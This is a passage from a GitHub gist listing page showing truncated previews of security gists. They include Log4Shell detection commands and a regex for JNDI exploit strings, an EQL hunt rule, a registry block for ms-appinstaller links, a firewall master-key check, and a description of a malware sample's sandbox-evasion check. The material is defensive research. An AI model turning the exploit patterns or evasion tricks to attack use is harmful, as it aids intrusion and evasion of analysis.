Dan danzek
LeeHolmes / Get-TwitterThread.ps1
Created Nov 15, 2022
Recover your Twitter threads from your Twitter export data
# The export file is JavaScript ("window.YTD.tweets.part0 = [...]"); drop the assignment prefix so the rest parses as JSON
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json
$currentThread = ""
foreach($currentTweetJson in $tweets)
{
    $currentTweet = $currentTweetJson.tweet
    # Self-replies are the tweets that form a thread
    if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
    {
        # (gist preview truncated here)
    }
}
gist:352b309a576a1654c6588eb9dcba6d9d (file truncated on this page): an obfuscated PowerShell sample whose visible prologue exits when its own script path matches strings such as avast, avg, sample, analysis, malware, sandbox or virus, a common analysis-evasion check.
rqu1 /
Last active Oct 29, 2022
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys
import time
import requests


class PanCrypt:
    # Gist preview truncated here; the class body is not shown on this page.
    ...
theevilbit /
Last active Apr 25, 2022
Download All Apple OSS Tarballs from Github
: '
You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs:
blotus / log4j_exploitation_attempts_crowdsec.csv
Last active Jan 11, 2023
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community
SwitHak /
Last active Feb 2, 2023
BlueTeam CheatSheet *Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say?

  • If you want to add a link, leave a comment or send it to me
  • Feel free to report any mistake directly below in the comments or by DM on Twitter @SwitHak

Other great resources

  • Royce Williams' list, sorted by vendor response: Royce List
  • Very detailed list: NCSC-NL
  • The list maintained by the U.S. Cybersecurity and Infrastructure Security Agency: CISA List
Neo23x0 /
Last active Jan 31, 2023
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all of its subfolders:

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
wdormann / noappinstaller.reg
Last active Dec 14, 2021
Prevent the ability to click on a ms-appinstaller: URI for the current user
Windows Registry Editor Version 5.00
"URL Protocol"=-
EQL hunt for Potential Macro on close
sequence by with maxspan=1s
[process where event.action : "creation_event" and : ("winword.exe", "excel.exe", "powerpnt.exe") and
not (process.executable : ("?:\\Windows\\System32\\WerFault.exe", "?:\\WINDOWS\\splwow64.exe") and
process.args_count >= 2)
] by process.parent.entity_id
[process where event.action : "termination_event" and : ("winword.exe", "excel.exe", "powerpnt.exe") and : ("winword.exe", "excel.exe", "powerpnt.exe", "explorer.exe", "outlook.exe", "thunderbird.exe")
] by process.entity_id
use std::net::ToSocketAddrs;
use std::sync::mpsc::channel;
fn main() {
std::env::set_var("LOCALDOMAIN", "1");
let mut threads = vec![];
let (tx, rx) = channel();